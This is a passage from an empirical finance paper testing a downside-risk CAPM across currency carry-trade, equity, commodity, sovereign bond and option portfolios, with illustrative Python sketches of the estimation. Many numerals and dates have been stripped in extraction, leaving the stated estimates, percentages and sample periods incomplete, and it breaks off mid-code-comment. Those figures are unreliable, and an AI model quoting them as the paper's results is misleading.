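# prices of risk estimated freely in the cross section. Inputs are placeholders.
import numpy as np

def two_pass(port_ret, factors):
    """port_ret: T x N excess returns; factors: T x K factor returns."""
    T, N = port_ret.shape
    X = np.column_stack([np.ones(T), factors])
    betas = np.linalg.lstsq(X, port_ret, rcond=None)[0][1:]      # K x N factor loadings
    r_bar = port_ret.mean(axis=0)
    lam = np.linalg.lstsq(betas.T, r_bar, rcond=None)[0]         # K prices of risk (no constant)
    alpha = r_bar - betas.T @ lam                                # pricing errors
    r2 = 1.0 - (alpha @ alpha) / (N * r_bar.var())
    return lam, alpha, r2

# placeholder factors and test assets
rng = np.random.default_rng(4)
factors = rng.normal(0.004, 0.03, (480, 3))
betas_true = rng.normal(1.0, 0.5, (3, 8))
port_ret = factors @ betas_true + rng.normal(0, 0.01, (480, 8))

lam, alpha, r2 = two_pass(port_ret, factors)
print("prices of risk:", lam, "cross-sectional R2:", round(r2, 2))

# effect of excluding one troublesome test asset (cf. the small-growth portfolio)
keep = np.arange(8) != 0
print("R2 excluding asset 0:", round(two_pass(port_ret[:, keep], factors)[2], 2))
```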
|
http://docplayer.net/77900-Conditional-risk-premia-in-currency-markets-and-other-asset-classes.html
|
CC-MAIN-2017-43
|
en
|
refinedweb
|
.
One window of opportunity to do exactly that has opened in the past few years. Clojure, a modern variant of Lisp that runs on the Java virtual machine (JVM), has been taking the programming world by storm. It's a real Lisp, which means that it has all of the goodness you would want and expect: functional programming paradigms, easy use of complex data structures and even such advanced facilities as macros. Unlike other Lisps, and contributing in no small part to its success, Clojure sits on top of the JVM, meaning that it can interoperate with Java objects and also work in many existing environments.
In this article, I want to share some of my experiences with starting to experiment with Clojure for Web development. Although I don't foresee using Clojure in much of my professional work, I do believe it's useful and important always to be trying new languages, frameworks and paradigms. Clojure combines Lisp and the JVM in just the right quantities to make it somewhat mainstream, which makes it more interesting than just a cool language that no one is really using for anything practical.
Clojure Basics
Clojure, as I mentioned above, is a version of Lisp that's based on the JVM. This means if you're going to run Clojure programs, you're also going to need a copy of Java. Fortunately, that's not much of an issue nowadays, given Java's popularity. Clojure itself comes as a Java archive (JAR) file, which you then can execute.
But, given the number of Clojure packages and libraries you'll likely want to use, you would be better off using Leiningen, a package manager for installing Clojure and Clojure-related packages. (The name is from a story, "Leiningen and the Ants", and is an indication of how the Clojure community doesn't want to use the established dependency-management system, Ant.) You definitely will want to install Leiningen. If your Linux distribution doesn't include a modern copy already, you can download the shell script from.
Execute this shell script, putting it in your PATH. After you download the Leiningen jarfile, it will download and install Leiningen in your ~/.lein directory (also known as LEIN_HOME). That's all you need in order to start creating a Clojure Web application.
With Leiningen installed, you can create a Web application. But in order to do that, you'll need to decide which framework to use. Typically, you create a new Clojure project with lein new, either naming the project on which you want to work (lein new myproject), or by naming the template you wish to copy and then the name of the project (lein new mytemplate myproject). You can get a list of existing templates by executing lein help new or by looking at the Clojars site, a repository for Clojure jarfiles and libraries.
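For instance, the two forms look like this at the shell (the "compojure" template used here is just one example of a community template; any template listed by lein help new will work the same way):

lein new myapp                 # a bare-bones project named "myapp"
lein new compojure myapp       # the same project, generated from the "compojure" template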
You also can open an REPL (read-eval-print loop) in order to communicate directly with Clojure. I'm not going to go into all the details here, but Clojure supports all the basic data types you would expect, some of which are mapped to Java classes. Clojure supports integers and strings, lists and vectors, maps (that is, dictionaries or hashes) and sets. And like all Lisps, Clojure indicates that you want to evaluate (that is, run) code by putting it inside parentheses and putting the function name first. Thus, you can say:
(println "Hello") (println (str "Hello," " " "Reuven")) (println (str (+ 3 5)))
You also can assign variables in Clojure. One of the important things to know about Clojure is that all data is immutable. This is somewhat familiar territory for Python programmers, who are used to having some immutable data types (for example, strings and tuples) in the language. In Clojure, all data is immutable, which means that in order to "change" a string, list, vector or any other data type, you really must reassign the same variable to a new piece of data. For example:
user=> (def person "Reuven")
#'user/person
user=> (def person (str person " Lerner"))
#'user/person
user=> person
"Reuven Lerner"
Although it might seem strange to have all data be immutable, this tends to reduce or remove a large number of concurrency problems. It also is surprisingly natural to work with given the number of functions in Clojure that transform existing data and the ability to use "def" to define things.
You also can create maps, which are Clojure's implementation of hashes or dictionaries:
user=> (def m {:a 1 :b 2})
#'user/m
user=> (get m :a)
1
user=> (get m :x)
nil
You can get the value associated with the key "x", or a default if you prefer not to get nil back:
user=> (get m :x "None")
"None"
Remember, you can't change your map, because data in Clojure is immutable. However, you can add it to another map, the values of which will override yours:
user=> (assoc m :a 100)
{:a 100, :b 2}
One final thing I should point out before diving in is that you can (of course) create functions in Clojure. You can create an anonymous function with fn:
(fn [first second] (+ first second))
The above defines a new function that takes two parameters and adds them together. However, it's usually nice to put these into a named function, which you can do with def:
user=> (def add (fn [first second] (+ first second)))
#'user/add
user=> (add 5 3)
8
Because this is common, you also can use the defn macro, which combines def and fn together:
user=> (add 5 3)
8
user=> (defn add [first second] (+ first second))
#'user/add
user=> (add 5 3)
8
|
http://www.linuxjournal.com/content/intro-clojure-web?page=0,0&quicktabs_1=1
|
CC-MAIN-2017-43
|
en
|
refinedweb
|
There are a few blog posts about Python that show how easy it is. Many of them are written more from a developer's point of view, in my opinion, so many Basis people may not even consider reading through them. Consequently they will be missing out on a great opportunity to make their lives easier and their work more efficient. I hope you enjoy this first part. There will be more depending on the time I have.
The Teaser
Scripting repetitive activities like a system copy or SAP refresh validation or other activities makes perfect sense. The problem is that many of the scripts developed over the years are not very reusable. One customer runs on Unix/Oracle, the next Windows/MSSQL and another perhaps DB2.
Ever since I came across Python I am simply blown away by how simple it is to create complex scripts even including GUIs and SAP integration. One of the refresh scripts I developed at one of my clients was written in VB script for Windows and SQL Server. The script was huge, complicated and very difficult to maintain for the “uninitiated”. The same functionality in Python would have been possible with a script less than 1/10th the number of lines. On top of that it would have been platform and even database independent! It would have also taken only a fraction of the time I required for the VBS script and would have been maintainable by almost to everybody.
For example these lines create a connection object to logon to SAP:
from pyrfc import Connection
conn = Connection(user=<username>,
passwd=<password>,
ashost=<hostname>,
sysnr=<system number>,
client=<client>)
Two commands and that’s it. From that point on, “conn” will be the name of the SAP connection object that can be used to interact with the SAP instance and allows you to do many really cool things. For example schedule a program as background job:
result_open = conn.call('SUBST_SCHEDULE_BATCHJOB',
                        JOBNAME=<jobname>,
                        REPNAME=<program>,
                        VARNAME=<variant>,
                        AUTHCKNAM=<username>,
                        SDLSTRTTM=datetime.time(<hour>,<minute>,<second>),
                        STRTIMMED='X')
3 lines of code to schedule a background job using a simple script. Let's look at some of the really good examples in the SCN that demonstrate how to use Perl for Basis tasks: Perl and SAP Adventures, Part 2
The perl script looks like this:
#!/usr/bin/perl -w
use strict;
use sapnwrfc; # load the SAPNW::Rfc module
SAPNW::Rfc->load_config; # load connection parameters
my $rfc = SAPNW::Rfc->rfc_connect; # connect to SAP system
my $rcb = $rfc->function_lookup("TH_SERVER_LIST"); # look up the function module
my $tsl = $rcb->create_function_call; # create the function call
$tsl->invoke; # execute the function call
foreach my $row (@{$tsl->LIST}) { # loop through each row in LIST array
print "Server is $row->{'NAME'}"; # print the server NAME value for each
}
$rfc->disconnect();
This is already easy but for someone that has never seen perl there are a lot of weird looking characters in the mix. Let’s do this in Python:
#!/usr/bin/python
from pyrfc import Connection # load the pyrfc.Connection method
conn = Connection(user=<username>, # logon to SAP
passwd=<password>,
ashost=<hostname>,
sysnr=<system number>,
client=<client>)
result = conn.call('TH_SERVER_LIST')    # execute the function module
for server in result['LIST']:           # loop over each row in the LIST list
    print "Server is " + server['NAME'] # print the NAME value for each server
conn.close() # close the connection
Simple, elegant and very easy to read and understand.
What you need
You don’t need a lot to get started:
- Obviously Python. If it's not already part of your OS you can download it from Python.org. You need version 2.7.6 since SAP's pyrfc module is only available for that version. Python 3.4 is not supported (yet?). There are also python bundles available that have a lot of modules already bundled in. There is also a portable Python version that does not require installation called WinPython.
- The PyRFC module: PyRFC – The Python RFC Connector . The module has excellent installation instructions. Just follow them step by step. You may be required to download additional python modules to get the PyRFC module going.
- Depending on what you want to do you may need other modules. For example the logger module for easy logging, or something to generate HTML coding. The amount available modules are endless in case the already vast standard functionality is not sufficient.
- It will be easier to use a dedicated Python IDE (Integrated Development Environment). Syntax highlighting and context sensitive online help makes the development even easier. An overview of the different IDEs available can be found in this article: Comparison of Python IDEs for Development | Python Central. I personally use PyCharm but sometimes it can be annoyingly slow to start.
Another thing is training and documentation. There are many, many books and online courses available for free, for example Google's Python Class or the free offerings from Codecademy. Or just work your way through the tons of example code that is available all over the Internet.
Start with something useful: List of delta transports for a System Copy
We want to perform a system copy to refresh the QA system from the production system as part of a dress rehearsal. After the system copy we need to import the transports that were in the QA system but didn't make it to production yet. The approach described here will not necessarily work in your environment, so don't accept it blindly without checking; better to assume the script does not work at all and test it thoroughly in your own environment first.
Here are the steps we need to accomplish:
- Logon to the source (PRD) and the target system (QAS)
- download tables TPALOG from both systems
- determine which transports are missing in the PRD system
- determine the sequence of the missing transports
- print the missing transports in the sequence they need to get applied.
Logging on
In this example we will store the logon information in a text file. In this example the text file contains a password stored in clear text. That's obviously not a good thing. In some later parts we will discuss ways around this, but for now let's stick with this approach. This is the text file:
[target]
user = TESTUSER
passwd = A very secure password!
ashost = qasp00
client = 020
sysnr = 00
sid = QAS
[source]
user = TESTUSER
passwd = A very secure password, too!
ashost = prdpp00
client = 020
sysnr = 00
sid = PRD
The file syntax corresponds to a standard windows .ini file. The configuration section is stored in “[ ]” and its values below it. The file should reside in the same directory as the script with the name ‘sapsystems.cfg’. It gets read by the Module ConfigParser which returns a dictionary object consisting of the values that belong to a configuration item.
The Script
from pyrfc import Connection
from ConfigParser import ConfigParser

config = ConfigParser()
config.read('sapsystems.cfg')

params_source = config._sections['source']   # read the logon information of the source system
params_target = config._sections['target']   # read the logon information of the target system

target_conn = Connection(user=params_target['user'],
                         passwd=params_target['passwd'],
                         ashost=params_target['ashost'],
                         client=params_target['client'],
                         sysnr=params_target['sysnr'],
                         sid=params_target['sid'])

# that's a lot of typing. The connection information is returned in a data
# structure called 'dictionary'. Using the following syntax we basically 'unpack'
# the content of the structure and make this whole thing a lot simpler:
source_conn = Connection(**params_source)

# The information we need is stored in table TPALOG. Since we don't
# want to download the entire table, we need to restrict the returned
# records. We are going to use function module RFC_READ_TABLE for this.
# The where clause there is stored in ABAP syntax. That means we need
# these statements:
target_where = "TARSYSTEM EQ '" + params_target['sid'] + \
               "' AND TRSTEP EQ 'I'"
source_where = "TARSYSTEM EQ '" + params_source['sid'] + \
               "' AND TRSTEP EQ 'I'"

# now let's read the data for the target system
target_result = target_conn.call('RFC_READ_TABLE',
                                 QUERY_TABLE='TPALOG',
                                 DELIMITER='|',
                                 OPTIONS=[{'TEXT': target_where}])

# we are going to store the transports in a 'set'. A set can do
# lots of things that would otherwise be very difficult to perform.
# The following list will be used for the import sequence later on.
list_transports_sequence = list()
target_transports = set()

for row in target_result['DATA']:
    splitrow = row['WA'].split('|')
    # here we add the transport to the set
    target_transports.add(splitrow[1].strip())
    # and here we append the import date and the transport as dictionary
    # to the list of all transports
    list_transports_sequence.append(dict(date=splitrow[0].strip(),
                                         transport=splitrow[1].strip()))

source_result = source_conn.call('RFC_READ_TABLE',
                                 QUERY_TABLE='TPALOG',
                                 DELIMITER='|',
                                 OPTIONS=[{'TEXT': source_where}])

# the same for the transports in the source system
source_transports = set()
for row in source_result['DATA']:
    splitrow = row['WA'].split('|')
    source_transports.add(splitrow[1].strip())

# now one of the cool things to do with sets:
missing_transports = target_transports - source_transports

# the returned set 'missing_transports' contains the transports that were
# imported into QAS but never made it to production. In the next step we
# determine the import sequence: keep only the missing transports and drop
# everything that was imported into both systems already.
list_transports_sequence[:] = [dic for dic in list_transports_sequence
                               if dic.get('transport') in missing_transports]

print("Missing transports in the sequence in which they need to get applied:")

# we need to order the list of the transports by import date.
for transport in sorted(list_transports_sequence, key=lambda tp: tp['date']):
    print(transport['transport'])
This is an excellent example. Thank you very much for this.
I executed the example, trying to include a limit by TRTIME. But the response I got was:
Then after a lot of searching I realized that the TEXT option is limited to 72 characters. I had to break the where clause into smaller chunks and pass a list of TEXT options.
SAP note 382318 states that:
Avoid to use the external generic table access (with function module RFC_READ_TABLE) in your solutions. The function is not meant to be publicly used.
What is an alternative to RFC_READ_TABLE that can be used to query already imported transports?
Kind regards,
Nikos.
Hi,
I’m not aware of any officially SAP supported generic table reader function module. There is function module TABLE_ENTRIES_GET_VIA_RFC but it has the same comments regarding SAP support as RFC_READ_TABLE. It has the advantage to support a row length of 2048 characters I think.
In your case it won’t help since the where clause field ‘SEL_TAB’ has the same length restriction as RFC_READ_TABLE.
If that is not sufficient, then an ABAP developer may need to write a custom solution for your requirements.
Best regards
Lars
Thanks Lars.
For anyone interested, a long where clause can be broken down in smaller chunks like this:
import textwrap

long_where_clause = ("TARSYSTEM EQ 'XXX' AND TRSTEP EQ 'I' "
                     "AND TRCLI EQ '999' AND TRTIME GE '20141201232323'")

OPTIONS = [{'TEXT': line} for line in textwrap.wrap(long_where_clause, 72)]
|
https://blogs.sap.com/2014/05/04/python-for-basis/
|
CC-MAIN-2017-43
|
en
|
refinedweb
|
It so happens that these days possibly I have started looking at things a bit differently. I have been programming more in Scala and Clojure and being exposed to many of the functional paradigms that they encourage and espouse, it has started manifesting in the way I think of programming. In this post I will look into dependency injection on a different note. At the end of it maybe we will see that this is yet another instance of a pattern melding into the chores of a powerful language's idiomatic use.
In one of my projects I have a class whose constructor has some of its parameters injected and the others manually provided by the application. Guice has a nice extension that does this for you - AssistedInject. It writes the boilerplate stuff by generating an implementation of the factory. You just need to annotate the implementation class' constructor and the fields that aren't known to the injector. Here's an example from the Guice page ..
public class RealPayment implements Payment {
@Inject
public RealPayment(
CreditService creditService, // injected
AuthService authService, // injected
@Assisted Date startDate, // caller to provide
@Assisted Money amount) { // caller to provide
...
}
}
Then in the Guice module we bind a
Provider<Factory>..
bind(PaymentFactory.class).toProvider(
FactoryProvider.newFactory(
PaymentFactory.class, RealPayment.class));
The FactoryProvider maps the create() method's parameters to the corresponding @Assisted parameters in the implementation class' constructor. For the other constructor arguments, it asks the regular Injector to provide values.
So the basic issue that AssistedInject solves is to finalize (close) some of the parameters at the module level to be provided by the injector, while keeping the abstraction open for the rest to be provided by the caller.
On a functional note this sounds a lot like currying .. The best rationale for currying is to allow for partial application of functions, which does the same thing as above in offering a flexible means of keeping parts of your abstraction open for later pluggability.
Consider the above abstraction modeled as a case class in Scala ..
trait CreditService
trait AuthService
case class RealPayment(creditService: CreditService,
authService: AuthService,
startDate: Date,
amount: Int)
One of the features of a Scala case class is that it generates a companion object automatically along with an apply method that enables you to invoke the class constructor as a function object ..
val rp = RealPayment( //.. is in fact syntactic sugar for RealPayment.apply( //.. that gets called implicitly. But you know all that .. right?
Now for a particular module, say I would like to finalize on PayPal as the CreditService implementation, so that the users don't have to pass this parameter repeatedly - just like the injector of your favorite dependency injection provider. I can do this as follows in a functional way and pass on a partially applied function to all users of the module ..
scala> case class PayPal(provider: String) extends CreditService
defined class PayPal
scala> val paypalPayment = RealPayment(PayPal("bar"), _: AuthService, _: Date, _: Int)
paypalPayment: (AuthService, java.util.Date, Int) => RealPayment = <function>
Note how the Scala interpreter now treats paypalPayment as a function from (AuthService, java.util.Date, Int) => RealPayment. The underscore acts as the placeholder that helps Scala create a new function object with only those parameters. In our case the new function takes only three parameters, for which we used the placeholder syntax. From your application point of view what it means is that we have closed the abstraction partially by finalizing the provider for the CreditService implementation and left the rest of it open. Isn't this precisely what the Guice injector was doing above, injecting some of the objects at module startup?
Within the module I can now invoke paypalPayment with only the 3 parameters that are still open ..
scala> case class DefaultAuth(provider: String) extends AuthService
defined class DefaultAuth
scala> paypalPayment(DefaultAuth("foo"), java.util.Calendar.getInstance.getTime, 10000)
res0: RealPayment = RealPayment(PayPal(foo),DefaultAuth(foo),Sun Feb 28 15:22:01 IST 2010,10000)
Now suppose for some modules I would like to close the abstraction for the AuthService as well, in addition to freezing PayPal as the CreditService. One alternative will be to define another abstraction as paypalPayment through partial application of RealPayment where we close both the parameters. A better option will be to reuse the paypalPayment abstraction and use explicit function currying. Like ..
scala> val paypalPaymentCurried = Function.curried(paypalPayment)
paypalPaymentCurried: (AuthService) => (java.util.Date) => (Int) => RealPayment = <function>
and closing it partially using the DefaultAuth implementation ..
scala> val paypalPaymentWithDefaultAuth = paypalPaymentCurried(DefaultAuth("foo"))
paypalPaymentWithDefaultAuth: (java.util.Date) => (Int) => RealPayment = <function>
The rest of the module can now treat this as an abstraction that uses PayPal for CreditService and DefaultAuth for AuthService. Like Guice we can have hierarchies of modules that inject these settings and publish a more specialized abstraction to downstream clients.
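As a small illustration of that last point (the object and value names below are mine, not from the original example), a "module" can simply be an object that performs the partial application once and exposes only the still-open function to its clients:

import java.util.Date

// A hypothetical module that freezes the infrastructure choices once.
object PayPalPaymentModule {
  // CreditService and AuthService are closed here; date and amount stay open.
  val newPayment: (Date, Int) => RealPayment =
    RealPayment(PayPal("bar"), DefaultAuth("foo"), _: Date, _: Int)
}

// Downstream client code never mentions PayPal or DefaultAuth at all.
val payment = PayPalPaymentModule.newPayment(new Date, 10000)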
|
http://debasishg.blogspot.com/2010/02/
|
CC-MAIN-2017-43
|
en
|
refinedweb
|
I2C LCD Controller (the Easy Way)
Introduction: I2C LCD Controller (the Easy Way)
I am working on an alarm/weather station project and I wanted to use an LCD but didn't want to have a lot of wires, so I ordered a controller. This is just a very basic tutorial on how to hook it up, for beginners like myself.
Step 1: Parts
Parts list:
1. LCD in this case a 16x02
1. I2C 1602 LCD Controller ($1.99 on ebay free shipping)
4. Jumper wires
1. Arduino ( I have a mega)
Step 2: Soldering
Now we solder the LCD and the controller. make sure you have the correct pin arrangement. Mine doesn't have a mark for pin one, but I just looked at the 5+ and GND inputs to figure it out.
Step 3: Connecting
it is very simple to connect only 4 wire 5+ and GND and SDA goes to Arduino pin 20 and SCL to pin 21 on my arduino mega. depending on what you have it might be different.
Step 4: The Code
Since the seller doesn't provide any info I needed to find the I2C address for the module, so I ran an I2C address scanner sketch.
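A typical I2C address scanner sketch looks something like the one below (this is a generic example rather than the exact listing used here); open the Serial Monitor at the baud rate set in the sketch and note the address it reports:

#include <Wire.h>

// Generic I2C address scanner: prints the address of every device that answers on the bus.
void setup()
{
  Wire.begin();
  Serial.begin(115200);
  Serial.println("I2C scanner started");
}

void loop()
{
  byte found = 0;
  for (byte address = 1; address < 127; address++)
  {
    Wire.beginTransmission(address);
    if (Wire.endTransmission() == 0)      // a device acknowledged at this address
    {
      Serial.print("Device found at 0x");
      Serial.println(address, HEX);
      found++;
    }
  }
  Serial.print(found);
  Serial.println(" device(s) found, scanning again in 5 seconds");
  delay(5000);
}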
Step 5: The Code Part II
the code is very simple..................................but you are going to need F Malpartida's LCD LIB Once again very basic very simple.
#include <Wire.h>
#include <LCD.h>
#include <LiquidCrystal_I2C.h> // F Malpartida's NewLiquidCrystal library
#define I2C_ADDR 0x20 // Define I2C Address for controller
#define BACKLIGHT_PIN 7
#define En_pin 4
#define Rw_pin 5
#define Rs_pin 6
#define D4_pin 0
#define D5_pin 1
#define D6_pin 2
#define D7_pin 3

LiquidCrystal_I2C lcd(I2C_ADDR, En_pin, Rw_pin, Rs_pin, D4_pin, D5_pin, D6_pin, D7_pin);
void setup()
{
lcd.begin (16,2); // initialize the lcd
// Switch on the backlight
lcd.setBacklightPin(BACKLIGHT_PIN,NEGATIVE);
lcd.setBacklight(LED_ON);
}
void loop()
{
// Reset the display
lcd.clear();
delay(1000);
lcd.home();
// Print on the LCD
lcd.backlight();
lcd.setCursor(0,0);
lcd.print("Hello, world!");
delay(8000);
}
Guys,
If any of you are struggling, I have found that some LCD modules have a different pinout on the 16 way connector. I am using a 20x4 RT204-1 Version 3 LCD Module (blue characters with built in backlight).
After a considerable amount of head-scratching and looking at datasheets, I came up with the following, which DOES work on my Arduino UNO with the RT204-1 20x4 module. Note that the pin numbers in the #defines are different in my code from the code published in the article.
Some I2C LCD driver modules have definable addresses. Please see the attached photo. If your unit is like mine, it will have three pads, marked A0, A1, and A2. The idea is you can short out the links (using soldered on jumper wire, or even better, solder on some header pins and use links. The header pins just fit on the solder pads). It seems these address pins are tied HIGH (1) if they are not connected (so linking them will take them low (0)). Hence the address of my LCD module, with no links on the address pins is 0x27, as shown in the code below.
Maybe this will help.
Regards
Mark
#include <Wire.h>
#include <LCD.h>
#include <LiquidCrystal_I2C.h> // F Malpartida's NewLiquidCrystal library
#define I2C_ADDR 0x27 // Define I2C Address for controller
#define En_pin 2
#define Rw_pin 1
#define Rs_pin 0
#define D4_pin 4
#define D5_pin 5
#define D6_pin 6
#define D7_pin 7
#define BACKLIGHT 3
LiquidCrystal_I2C lcd(I2C_ADDR,En_pin,Rw_pin,Rs_pin,D4_pin,D5_pin,D6_pin,D7_pin);
void setup()
{
lcd.begin (20,4); // initialize the lcd
// Switch on the backlight
lcd.setBacklightPin(BACKLIGHT,POSITIVE);
lcd.setBacklight(HIGH);
}
void loop()
{
// Reset the display
lcd.clear();
delay(1000);
lcd.home();
// Print on the LCD
lcd.backlight();
lcd.setCursor(0,0);
lcd.print("Hello Isla from Dad!");
delay(1000);
}
Thank You Mark!
I was scratching my head as well.
I have a 16x2 display on a Mega 2560 which seems to work on the same principal as your 20x4.
I had to change the "lcd.begin (20,4);" to "lcd.begin (16,2);"
The actual pinout of the LCD module is not different. What is different is how the PCF8574 8 pin output port is wired to the LCD pins. That is what the parameters in the constructor are configuring.
You could try using my hd44780 library instead.
It will automatically locate the i2c address and auto configure the pin mappings.
It can be quickly and easily installed using the IDE library manager and you can read more about it here:
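For anyone curious, a minimal test sketch with that library looks roughly like this (my illustration of typical usage, not code taken from the comment above):

#include <Wire.h>
#include <hd44780.h>                       // main hd44780 header
#include <hd44780ioClass/hd44780_I2Cexp.h> // i/o class for I2C expander backpacks

hd44780_I2Cexp lcd;   // auto-detects the I2C address and pin mapping

void setup()
{
  lcd.begin(16, 2);          // columns and rows of your display
  lcd.print("Hello, world!");
}

void loop() {}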
Thanks, very helpful!
Markwills, I have the same kind as yours, although I am not able to display any text. Can you please help ASAP?
Adjust the contrast pot on the back until you see text
Thanks!
Not Working out for me and my Arduino Pro Mini... HELP. Cannot find LCD Address
Does it work with 1604 as well?
why using port 0 thru 6, when using the I2C interface???
Hi, what do I have to do so that the LEDs light up at the end of the text???? I can't manage it...
The code to search for the I2C address is awesome... Very Helpful!
Where can you find the LCD.H Library?
You need to install this library
good question
check this site...
It has a lot of info on these I2C devices. The I2C ADDRESS SCANNER is a cool one; you can find the address of your display with it.
Two days and all I get is white boxes..
same on the Uno and Nano..
I am over it..
We need more info what controller and what lcd are you using. It sounds to me like your backlight is out of adjustment.
The DF Robot display works fine (only tested on the Nano) with a certain program but the other thing doesn't work at all on both my Nano or Uno, just a blue led backlight and white boxes.
How did you solve this?
I found that the white boxes were a result of the contrast control being set wrong, once I figured that out it worked for me.
Send me your code and I will take a look at it for you. I am working on a four line display using the I2C and have been sending text to it easily.
Really thanks!! The address are diferent!! 27 and 3F
Great help!!
Guys, no text, only light is present. Any suggestions?
First thing THANKS EVERYONE FOR YOUR CONTRIBUTIONS!!
I finally got it working thanks to your help!!
markwills, it was your code that finally worked.
Now what /why are the pins defined?
#define En_pin 2
#define Rw_pin 1
#define Rs_pin 0
#define D4_pin 4
#define D5_pin 5
#define D6_pin 6
#define D7_pin 7
#define BACKLIGHT 3
How would they be used?
Thanks again,
Ralph
Every time I try the "Hello world" test I get the same problem: the LCD shows only the letter "H" and nothing more, and the second row shows only a "heart" character. What could be wrong with the library?
i understand that the backlight polarity can be combined in the lcd initialisation:
lcd(I2C_ADDR,En_pin,Rw_pin,Rs_pin,D4_pin,D5_pin,D6_pin,D7_pin, POSITIVE);
lcd(I2C_ADDR,En_pin,Rw_pin,Rs_pin,D4_pin,D5_pin,D6_pin,D7_pin,BACKLIGHT_PIN, POSITIVE);
yes you are fully right. tnx
Yes you are correct, its all about the efficiency of the code the way you have it it is much better and the way is suppose to be done. but for the lack of time and knowledge I used a different method. Thank you for pointing it out, if it wasn't for you I would have never given a second thought and looked at that library again. Thanks
For some reason it uploads but nothing happens and it says;
Multiple libraries were found for "LCD.h"
Used: C:\Users\-\Documents\Arduino\libraries\fmalpartida-new-liquidcrystal-bb6d545c00c3
Not used: C:\Users\-\Documents\Arduino\libraries\NewliquidCrystal
Not used: C:\Users\-\Documents\Arduino\libraries\NewliquidCrystal
Not used: C:\Users\-\Documents\Arduino\libraries\NewliquidCrystal
Not used: C:\Users\-\Documents\Arduino\libraries\NewliquidCrystal
do we need both parts of the code?
Really helpful guide for a project I'm testing at the moment, Thanks!
need help...
when scanning for the I2C address over serial
Just change your baud rate on the serial monitor to 115200; you have it set as 9600
Your baud rate is wrong, it should be:
Serial.begin(115200);
OK, not so simple for me. What do I do with the code in step 4? Obviously I run the code in step 5, but where do I download F Malpartida's LCD LIB that you make reference to in step 5? Have a look at the URL you provided that you say has the file we need; there is no such file there. What's the name of the zip file I'm supposed to download? It's definitely not LCD LIB.
Please advise me...
Thanks
It depends on the version of the IDE that you are running. If you have the newest version you can use the library manager to install the library: open the IDE and click the "Sketch" menu and then Include Library > Manage Libraries. If you are using an older version, all you have to do is unzip the files and copy the folder to your library folder.
You can download it from the top link.
You know,
Anyone that's reading this can answer my question below or the one VasaS asked over a year ago. It looks like the guy that posted this just gave up answering questions or just doesn't bother coming around anymore. So if anyone reads this and if you know the answers then by all means jump in to answer.
Thanks
jes
How did you find the pin values below?
#define BACKLIGHT_PIN 7
#define En_pin 4
#define Rw_pin 5
#define Rs_pin 6
#define D4_pin 0
#define D5_pin 1
#define D6_pin 2
#define D7_pin 3
Are they the pin numbers on the actual controller that are plugged into the lcd?
If they are how did you find those values?
It's the pinout value of the i2c device connected to the screen.
yes, I am using an lcd with a Hitachi HD44780 driver if you look at the picture with the pinout you will see the values.
Well, it is working! Pay attention to the contrast adjustment on the back of the I2C... I thought the LCD was not working because I didn't see any chars. :D
THIS.
I lost some minutes believing I had some strange display or controller or that one or both of them were defective, but as soon as I adjusted the contrast the darn thing worked like a charm as per turbiny code.
I thought that potentiometer was for backlight at first so I didn't really give it much attention.
Just posting, maybe someone will need this.
I ordered from AliExpress and this is the code that worked after a week of trying:
I did alter some comments
/* YourDuino.com Example Software Sketch
20 character 4 line I2C Display
Backpack Interface labelled "LCM1602 IIC A0 A1 A2"
terry@yourduino.com */
/*-----( Import needed libraries )-----*/
#include <Wire.h> // Comes with Arduino IDE
// Get the LCD I2C Library here:
//...
// Move any other LCD libraries to another folder or delete them
// See Library "Docs" folder for possible commands etc.
#include <LiquidCrystal_I2C.h>
/*-----( Declare Constants )-----*/
//none
/*-----( Declare objects )-----*/
// set the LCD address to LiquidCrystal_I2C lcd(0x27, 2, 1, 0, 4, 5, 6, 7, 3, POSITIVE); for a 16 chars 2 line display
LiquidCrystal_I2C lcd(0x27, 2, 1, 0, 4, 5, 6, 7, 3, POSITIVE);
/*-----( Declare Variables )-----*/
//none
void setup() /*----( SETUP: RUNS ONCE )----*/
{
Serial.begin(9600); // Used to type in characters
lcd.begin(16,2); // initialize the lcd for 16 chars 2 lines and turn on backlight
// ------- Quick 3 blinks of backlight -------------
for(int i = 0; i< 3; i++)
{
lcd.backlight();
delay(250);
lcd.noBacklight();
delay(250);
}
lcd.backlight(); // finish with backlight on
//-------- Write characters on the display ----------------
// NOTE: Cursor Position: CHAR, LINE) start at 0
lcd.setCursor(2,0); //Start at character 4 on line 0
lcd.print("hello BEBUSH!");
delay(1000);
lcd.setCursor(2,1);
lcd.print("WE <3 YOU");
delay(1000);
lcd.setCursor(0,2);
lcd.print("16by2 Line Display");
lcd.setCursor(0,2);
delay(2000);
lcd.print("");
delay(8000);
// Wait and then tell user they can start the Serial Monitor and type in characters to
// Display. (Set Serial Monitor option to "No Line Ending")
lcd.setCursor(0,0); //Start at character 0 on line 0
lcd.print("Start Serial Monitor");
lcd.setCursor(0,1);
lcd.print("Type chars 2 display");
}/*--(end setup )---*/
void loop() /*----( LOOP: RUNS CONSTANTLY )----*/
{
{
// when characters arrive over the serial port...
if (Serial.available()) {
// wait a bit for the entire message to arrive
delay(100);
// clear the screen
lcd.clear();
// read all the available characters
while (Serial.available() > 0) {
// display each character to the LCD
lcd.write(Serial.read());
}
}
}
}/* --(end main loop )-- */
/* ( THE END ) */
I get a compilation error saying "POSITIVE" was not declared in this scope =/
I found the address of my I2C and I used your code, but all I got was 3 blinks and then only an empty backlit display...
Thank you, your code works! Saved me a week I guess :)
Glad I was helpful.
I had to search many sites/forums until I found what worked.
|
http://www.instructables.com/id/I2C-LCD-Controller-the-easy-way/
|
CC-MAIN-2017-43
|
en
|
refinedweb
|
Tip
Try the Microsoft Azure Storage Explorer
Microsoft Azure Storage Explorer is a free, standalone app from Microsoft that enables you to work visually with Azure Storage data on Windows, macOS, and Linux.
About this tutorial
This tutorial will demonstrate the basics of using Python to develop applications or services that use Azure Files to store file data. In this tutorial, we will create a simple console application and show how to perform basic actions with Python and Azure Files:
- Create Azure File shares
- Create directories
- Enumerate files and directories in an Azure File share
- Upload, download, and delete a file
Note
Because Azure Files may be accessed over SMB, it is possible to write simple applications that access the Azure File share using the standard Python I/O classes and functions. This article will describe how to write applications that use the Azure Storage Python SDK, which uses the Azure Files REST API to talk to Azure Files. The examples below use the azure-storage-file package.
Install via PyPi
To install via the Python Package Index (PyPI), type:
pip install azure-storage-file
Set up your application to use Azure Files
Add the following near the top of any Python source file in which you wish to programmatically access Azure Storage.
from azure.storage.file import FileService
Set up a connection to Azure Files
The
FileService object lets you work with shares, directories and files. The following code creates a
FileService object using the storage account name and account key. Replace
<myaccount> and
<mykey> with your account name and key.
file_service = FileService(account_name='myaccount', account_key='mykey')
